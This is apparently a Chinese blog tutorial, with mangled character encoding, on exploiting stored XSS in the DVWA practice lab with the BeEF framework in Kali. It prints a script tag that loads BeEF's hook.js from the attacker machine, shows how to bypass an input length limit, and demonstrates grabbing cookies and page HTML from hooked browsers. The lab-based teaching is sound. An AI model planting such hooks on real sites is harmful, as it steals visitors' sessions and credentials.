跨站腳本漏洞(Cross-site scripting,通常簡(jiǎn)稱為XSS)發(fā)生在客戶端,可被用于進(jìn)行竊取隱私、釣魚欺騙、竊取密碼、傳播惡意代碼等攻擊。XSS攻擊使用到的技術(shù)主要為html和JAVAscript,也包括VBScript和ActionScript等。XSS攻擊對(duì)WEB服務(wù)器雖無(wú)直接危害,但是它借助網(wǎng)站進(jìn)行傳播,使網(wǎng)站的使用用戶受到攻擊,導(dǎo)致網(wǎng)站用戶帳號(hào)被竊取,從而對(duì)網(wǎng)站也產(chǎn)生了較嚴(yán)重的危害。想要了解更多關(guān)于XSS漏洞的信息,可以查看我的文章《十大常見(jiàn)web漏洞——跨站腳本漏洞》和《實(shí)操web漏洞驗(yàn)證——跨站腳本漏洞》兩篇文章。
BeEF是我遇見(jiàn)的唯一一款XSS漏洞利用工具,也是集成在kali系統(tǒng)當(dāng)中的,我說(shuō)過(guò),能夠被kali所看中的工具,都是十分強(qiáng)大的工具,下面我們就來(lái)介紹一下BeEF這款工具是怎么利用XSS漏洞的,首先我們打開(kāi)kali,選擇左上角“應(yīng)用程序-漏洞利用工具集-beef xss”,如下圖所示:
kaili
點(diǎn)擊后,稍微等待一會(huì)就會(huì)出現(xiàn)如下圖界面,我們需要注意的是圖中紅框中的內(nèi)容,web UI:http://127.0.0.1:3000/ui/panel,我們可以在kali中打開(kāi)瀏覽器訪問(wèn)這個(gè)鏈接。
BeEF
打開(kāi)kaili中火狐瀏覽器,輸入:http://127.0.0.1:3000/ui/panel,就會(huì)進(jìn)入出現(xiàn)如下登錄界面,用戶和密碼都是beef。我再次強(qiáng)調(diào)是在kaili中的瀏覽器中登錄BeEF,如果不是的話,就需要修改ip地址:127.0.0.1為虛擬機(jī)kaili的ip地址,我查了一下是:192.168.199.137,也就是訪問(wèn):http://192.168.199.137:3000/ui/panel,來(lái)進(jìn)入登錄界面。
BeEF登錄界面
輸入用戶和密碼,都是beef,點(diǎn)擊登錄后就會(huì)進(jìn)入BeEF主界面,左側(cè)顯示在線和不在線的受到攻擊的主機(jī),現(xiàn)在還沒(méi)有利用存在漏洞的站點(diǎn),所以都為空。
BeEF主界面
下面我們利用DVWA中的存儲(chǔ)型XSS漏洞來(lái)演示BeEF是怎樣的利用XSS漏洞的,首先進(jìn)入DVWA,選擇XSS(stored),如下圖所示:
DVWA
在Name輸入框中輸入XSS(也可以取其他名字),在Message輸入框中輸入圖BeEF中紅框中的最后一段代碼:<script src="http://127.0.0.1:3000/hook.js"></script>,這里同樣需要將ip地址修改為kaili的ip地址即:<script src="http://192.168.199.137:3000/hook.js"></script>,因?yàn)镈VWA不是在kaili中搭建的,這時(shí)還有一個(gè)問(wèn)題Message輸入框設(shè)置了輸入內(nèi)容長(zhǎng)度限制,我們可以在瀏覽器中按“F12”,找到Message輸入框?qū)?yīng)的代碼“maxlength”參數(shù)50改為200,就可以輸入了,最后點(diǎn)擊“Sign Guestbook”。
這時(shí)其實(shí)我訪問(wèn)DVWA的主機(jī)已經(jīng)中招了,我們打開(kāi)kali中的瀏覽器,查看BeEF主界面,這時(shí)左側(cè)“Online Browsers”就會(huì)出現(xiàn)中招主機(jī)的ip地址,從圖標(biāo)中可以看出是windows系統(tǒng)。
為了對(duì)比顯示,我們?cè)趉ali的瀏覽器中訪問(wèn):http://192.168.9.202:8000/DVWA/,也就是存在XSS漏洞的DVWA的XSS(stored)界面,因?yàn)槭谴鎯?chǔ)型XSS,所以只要點(diǎn)擊XSS(stored),就會(huì)造成XSS攻擊,再返回BeEF主界面可以看到左側(cè)“Online Browsers”又多了一個(gè)linux主機(jī)ip,如下圖所示:
下面我們演示幾個(gè)簡(jiǎn)單的BeEF攻擊,我們點(diǎn)擊左側(cè)在線主機(jī)ip,就會(huì)跳出如下圖的一個(gè)界面,這里顯示了一些該主機(jī)的一些簡(jiǎn)單信息。
我們選擇“Commends-Browser-Hooked Domain-Get Cookies”點(diǎn)擊右下角“Execute”,就可以獲得當(dāng)前頁(yè)面的cookies值。
點(diǎn)擊“Get Page HTML”再點(diǎn)擊右下角“Execute”,點(diǎn)擊攻擊記錄,就可以獲得頁(yè)面的HTML代碼,如下圖所示:
在這里我就演示這兩個(gè)簡(jiǎn)單的攻擊操作,BeEF里還有許多利用XSS漏洞攻擊的方式,其中還包括偽造用戶登錄界面,騙取用戶輸入用戶名和密碼,從而非法得到用戶的登錄信息,有興趣的用戶可以安裝測(cè)試環(huán)境自己親身操作,文章中涉及到的kaili和DVWA環(huán)境,有機(jī)會(huì)我會(huì)介紹給大家,歡迎關(guān)注@科技興了解更多科技尤其是網(wǎng)絡(luò)安全領(lǐng)域的知識(shí)。